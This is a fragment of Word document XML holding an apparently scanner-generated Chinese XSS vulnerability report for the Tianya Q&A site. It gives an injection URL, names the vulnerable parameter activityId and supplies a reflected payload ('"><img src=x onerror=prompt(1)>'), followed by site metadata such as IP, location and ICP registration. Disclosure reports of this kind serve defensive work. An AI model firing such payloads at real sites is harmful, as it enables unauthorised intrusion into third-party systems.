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注入网址:http://wenda.tianya.cn/expert.jsp?activityId=1bg8a8bls0u9d0ame8q63rl011ec5bp7dchkh"&gt;&lt;img src=x onerror=prompt(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞参数:activityId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攻击载荷:"&gt;&lt;img src=x onerror=prompt(1)&gt;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6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站主页  http://wenda.tianya.cn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站描述  "这是一个天涯社区旗下的问题分享平台。在这里您可以根据自身需求提出问题，回答、关注感兴趣的问题和话题，分享知识和经历，并与其他志趣相投的好友讨论和交流。" /</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站标题  天涯问答_天涯社区旗下的问题分享平台_天涯社区</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>IP__坐标  海南省海口市 电信</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>所属__IP  124.225.213.208</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站年龄  16年1月16天（创建于2003年03月17日,过期时间为2023年03月17日)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案编号  琼B2-20040038-1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天涯社区网络科技股份有限公司</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案时间  2019/4/10 0:00:00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>百度收录  149万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>页面类型  暂无信息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http://wenda.tianya.cn/expert.jsp?activityId=1bg8a8bls0u9d0ame8q63rl011ec5bp7dchkh"&gt;&lt;img src=x onerror=prompt(1)&gt;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